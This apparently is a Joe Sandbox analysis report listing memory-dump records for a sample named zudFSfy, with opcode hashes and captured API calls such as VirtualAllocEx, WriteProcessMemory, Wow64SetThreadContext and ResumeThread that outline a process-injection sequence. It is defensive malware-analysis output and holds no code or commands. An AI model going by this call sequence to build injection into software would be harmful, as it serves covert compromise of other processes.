                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_9f00000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DrawText
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2175133113-0
                                                                                                                                                                                                                                          • Opcode ID: d81e57a75d0b463455f873172650ee9581378a45eb95f6913e4aefecc20860a7
                                                                                                                                                                                                                                          • Instruction ID: 2e0456fdde21cc48847f9c5fb1e004a9552301a3144fac94f438676ea484ccc3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d81e57a75d0b463455f873172650ee9581378a45eb95f6913e4aefecc20860a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B131C7B5D002099FDB10CF99D88469EFBF9FB58320F14842AE915A7250D7759944CFA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04D13B88
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                                                                                          • Opcode ID: 57d4d0cd847eb377a520ff9e30372f3e03e40977c9b7b4313ccb960c011e6fab
                                                                                                                                                                                                                                          • Instruction ID: 27d9753b766e1d61e443c20b2784db72f20e441710dcc6f1a374004ae3ba70e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57d4d0cd847eb377a520ff9e30372f3e03e40977c9b7b4313ccb960c011e6fab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 952157B1900309DFDB10CFA9D985BDEBBF5FF48320F108429E919A7250D778A944CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04D13B88
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3559483778-0
                                                                                                                                                                                                                                          • Opcode ID: dad765f1c9356328755c2c8e1114a4f8f01fd716f7d3d3fb81ed273146df2f3c
                                                                                                                                                                                                                                          • Instruction ID: 612b71bd77ddede9b21df86fe10c9bdac8fd3305ba7f0b2022fd03b5142c65f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dad765f1c9356328755c2c8e1114a4f8f01fd716f7d3d3fb81ed273146df2f3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 582146B1900349DFDB00CFA9D980BDEBBF1FF48320F10842AE959A7250D7789544CB94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04D13C68
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                                                                                                          • Opcode ID: 95d8ecf1a566181d24e79e9e5a8cf4b13f73c2ade4c04295776a39c13f5051d0
                                                                                                                                                                                                                                          • Instruction ID: f3153f648da3648c898e0397a5004094dbe1e09ed02d6140f9f5df37f6f86831
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95d8ecf1a566181d24e79e9e5a8cf4b13f73c2ade4c04295776a39c13f5051d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 982148B18002599FDB10DFAAD881ADEFBF5FF48320F10842AE959A7250C7389955CBA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04D139DE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                                                                                          • Opcode ID: b8fd6a87573a22b9ef2a6a0c755703e19756127440a3779d761946a5c986772f
                                                                                                                                                                                                                                          • Instruction ID: 95b3cdd703ca1d1af2af1e9ae1c63ec5f388c95ceb6443c6ad8c13448e67a02f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8fd6a87573a22b9ef2a6a0c755703e19756127440a3779d761946a5c986772f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D216AB19002099FDB14DFAAC4857EEFFF4EF89314F108429D959A7250C7789545CF94
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04D139DE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ContextThreadWow64
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 983334009-0
                                                                                                                                                                                                                                          • Opcode ID: 8ba4ee70734a1cb1bfcae633cfb5ac9404f9c45dd88eb89a4a2fef4ee39dfd58
                                                                                                                                                                                                                                          • Instruction ID: 67ff3efaf858a29cf9e1938d041cdfd50b79efa065c9ea2b5179ae6d03291b85
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ba4ee70734a1cb1bfcae633cfb5ac9404f9c45dd88eb89a4a2fef4ee39dfd58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D2138B19002099FDB10DFAAC4857EEBBF4EF89324F108429D859A7250CB78A945CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04D13C68
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1726664587-0
                                                                                                                                                                                                                                          • Opcode ID: 836f80f2b7250ae20580ea51f441f78c46ca4d6dd2ca7b99b90850e698037a2e
                                                                                                                                                                                                                                          • Instruction ID: cd2be87f9848edaacdb84a603de0c288ebad3a8e034475c450599f528984db79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 836f80f2b7250ae20580ea51f441f78c46ca4d6dd2ca7b99b90850e698037a2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A72148B18002499FDB10DFAAD880ADEFBF5FF48310F108429E918A7250C738A550CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 09BD7C03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2489257969.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_9bd0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: cd1a33b394196c50f210523c28f36324ee931751bded8f71faa18915401f2801
                                                                                                                                                                                                                                          • Instruction ID: 8d74e4a586fa8094538b4f30828749123e721a2225c8dead0c94d27f9a8a9d8a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd1a33b394196c50f210523c28f36324ee931751bded8f71faa18915401f2801
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E32138B5900249DFCB10DF9AD584BDEFBF4EB48320F148029E858A3250D774A544CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,09F0C6EA,?,?,?,?,?), ref: 09F0C78F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2489646637.0000000009F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F00000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_9f00000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFromIconResource
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3668623891-0
                                                                                                                                                                                                                                          • Opcode ID: 046b578437b6f645b4aba3597b0a6c8dc93837abe4a3c3aa25973ea06b11d63a
                                                                                                                                                                                                                                          • Instruction ID: a1f5d1ed8568acf53cde22001d326e2c5a9fe2957ea8fd67ce1f539ad315fe3e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 046b578437b6f645b4aba3597b0a6c8dc93837abe4a3c3aa25973ea06b11d63a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E91137B5800249DFDB10DF9AD844BDEBFF8EB88320F14841AE954A7250C375A954DFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 09BD7C03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2489257969.0000000009BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BD0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_9bd0000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                                                          • Opcode ID: e9c318de15b8f320374f901379c829baa9897fa39270b95d090875a1ebd98b23
                                                                                                                                                                                                                                          • Instruction ID: 5aee60fe5e8a175f68102a6abc3a7e94bdf13c1a28893841681491358a4be12b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9c318de15b8f320374f901379c829baa9897fa39270b95d090875a1ebd98b23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 682114B5900249DFCB10DF9AD984BDEFBF4FB48320F108429E958A7250D778A544CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04D13AA6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 87931d9f6dc278c044b93686e18d7fe957f315b0c3b7e1293863c15263080fd6
                                                                                                                                                                                                                                          • Instruction ID: ce7ec18c326894b6cfb329c2b15a0f5493f21d83da8ac15d0f7774f2f4efb6d5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87931d9f6dc278c044b93686e18d7fe957f315b0c3b7e1293863c15263080fd6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B1159718002489FDB10DFA9D844ADEBFF5EF88320F108419D919A7250C735A544CFA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04D13AA6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 6955b1c4b819d526d9e0d19e11a85f67a6a1c9c9a04287bd8d32b49f84af9fe3
                                                                                                                                                                                                                                          • Instruction ID: 17adc13077f2f56485196772e7775e49373ab1e1c8aab54fd3c1c5b6d3aedb52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6955b1c4b819d526d9e0d19e11a85f67a6a1c9c9a04287bd8d32b49f84af9fe3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 981167B2900249DFDB10DFA9D4407DEBFF5EF88320F20841AD959A7260C735A544CF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                          • Opcode ID: a268144140125f288610aa7698c695c976558ab35af2e21424b77fa2312436e6
                                                                                                                                                                                                                                          • Instruction ID: 71f27f8df7c206efa2411cfdb7412c521591b2e06d897d4491a447212d4b3e30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a268144140125f288610aa7698c695c976558ab35af2e21424b77fa2312436e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D1125B1900249CFDB20DFAAD4457EEFBF5EB88324F24842AD459A7250C639A945CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                                                                                                          • Opcode ID: fd01735fe8c0603db0f3aedcd7af0395111e7696c9448eafe805910a61b4b7db
                                                                                                                                                                                                                                          • Instruction ID: 212ba5bc9399c3f43311800ff0914e802c0889021ffb6ad1b21ff4e5dd641511
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd01735fe8c0603db0f3aedcd7af0395111e7696c9448eafe805910a61b4b7db
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 501136B19002488FDB20DFAAD4457EEFBF4EF89324F208429D559A7250CB79A944CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04D1628D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                                                          • Opcode ID: 469e61cc626d211bf7191761592e82e173fc81689ff6ee8a651ed75122dad35e
                                                                                                                                                                                                                                          • Instruction ID: eb294d9c3e6f7340b4f2eeed2aa7218884586770de8f55158c507b2a015713cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 469e61cc626d211bf7191761592e82e173fc81689ff6ee8a651ed75122dad35e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A1133B5900308EFDB10DF8AD885BDEBBF8EB48320F108419E958A7210C375A940CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0125E5C6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2477425443.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1250000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                                                                                                          • Opcode ID: 68a40dde7b3e6f63d8a46a2d394c4f94f89a5824a82d976d25d5eac022c74fd7
                                                                                                                                                                                                                                          • Instruction ID: 388906dcccb8151a241b93befcf79377b9cb4644d3fac54044cb54757227c38d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68a40dde7b3e6f63d8a46a2d394c4f94f89a5824a82d976d25d5eac022c74fd7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 661102B5C002498FDB10DF9AD444ADEFBF4AB88214F10846AD919A7210D375A645CFA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04D1628D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                                                                                                          • Opcode ID: 2ef9ead37422239dea9e204f21284f12dad2ae04c53cd2733d6060ff1bd4523e
                                                                                                                                                                                                                                          • Instruction ID: 5055a384215c074ae8383f031d9395d4a1932033322f607106ff7a5ad42931a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef9ead37422239dea9e204f21284f12dad2ae04c53cd2733d6060ff1bd4523e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 911130B5900348DFDB10DF99E584BDEBFF8EB48320F20841ADA58A3250C378A584CFA1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2475855079.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_f1d000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b129c2030ae5b9f2d24859f9e51c5631871e735db9bfac9b8436b6dc496c5248
                                                                                                                                                                                                                                          • Instruction ID: 975d9d486ca3a431f1583f227082d3345eba4129256ce148c48a1921bbc537fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b129c2030ae5b9f2d24859f9e51c5631871e735db9bfac9b8436b6dc496c5248
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4212671904284EFDB05DF14D9C0B66BBB5FB84324F30C66DE8094B296C33AD886EA61
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2475855079.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_f1d000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bd4241cb9168b443275b13eb99a7a5ec70bf32fec000231ac4fb140f91c0cdb5
                                                                                                                                                                                                                                          • Instruction ID: 8b86c33cc68e2577360f38a32aade5ff8174c1547228f3b47634756c5876a6d4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd4241cb9168b443275b13eb99a7a5ec70bf32fec000231ac4fb140f91c0cdb5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821F575504200DFCB14DF14D984B56BB75EB88324F20C56DD80A4B25AC33AD887DA61
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2475855079.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_f1d000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: bd0581a60090b6af27bd246cd7bcb85cea4b3af54848e75445cf93538388d94a
                                                                                                                                                                                                                                          • Instruction ID: 84d2f8296d100258e8cf4b29a43c59f3b1075f1e09a8c79adf52549408944d80
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd0581a60090b6af27bd246cd7bcb85cea4b3af54848e75445cf93538388d94a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 492180755093808FCB02CF24D994756BF71EB46314F28C5EAD8498F2A7C33A984ADB62
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2475855079.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_f1d000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                                          • Instruction ID: 86081ee818bff8329feade72ded49f8bf511ea4ba3ee6f5d3c090df2a67c7785
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD11BB75904280DFCB06CF14C9C4B55BBB1FB84324F24C6AAD8494B696C33AD84ADB61
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2475801498.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_f0d000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e649dd6b7625906920e4e0df8b0527fa0d93e4ecf3e70e15d805f981dbf9bcfd
                                                                                                                                                                                                                                          • Instruction ID: 64de01b34506f046f7132fc7e1de24a640249eab23f600601b3ccfd4daf66cd4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e649dd6b7625906920e4e0df8b0527fa0d93e4ecf3e70e15d805f981dbf9bcfd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A012B714093409AE7104E69CD84B67FF9CDF81334F18C52AED080B2C6C239D840F6B1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2475801498.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_f0d000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 50a7c76b63960799eb9ddd4cc74e9b5ffbd873c3bec7cdc8be85dda1ec34ed7a
                                                                                                                                                                                                                                          • Instruction ID: 01b78ef4c5818763560ad38d5970fb9aaaa64e65886f27557f67a468677e4f09
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50a7c76b63960799eb9ddd4cc74e9b5ffbd873c3bec7cdc8be85dda1ec34ed7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F06D71409344AAE7148E1AD988B66FFA8EF95734F18C45AED084B2C6C2799844DBB1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 76eb2e0aa1b4e0f84fc3e03f2e4cad484e7ad6416631ac95b4a944c7618de3b5
                                                                                                                                                                                                                                          • Instruction ID: 959e39a9f837569d8c6e479adf92a461805e1917258f398fcc55a7f30fdaeb20
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76eb2e0aa1b4e0f84fc3e03f2e4cad484e7ad6416631ac95b4a944c7618de3b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFE0BF34A49148EBCB50CF54F4A56FCB7B8E78E315F002051D94EA3261E738A9949B00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.2483270961.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_4d10000_zudFSfy.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2c9cefc4d40ed2bef6ae447022be19032005cfe4be028c184d5d0094ab85dded
                                                                                                                                                                                                                                          • Instruction ID: ee98d2c192b681867f9f06d166dd9389922715849356186b8b4418351d78c3b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c9cefc4d40ed2bef6ae447022be19032005cfe4be028c184d5d0094ab85dded
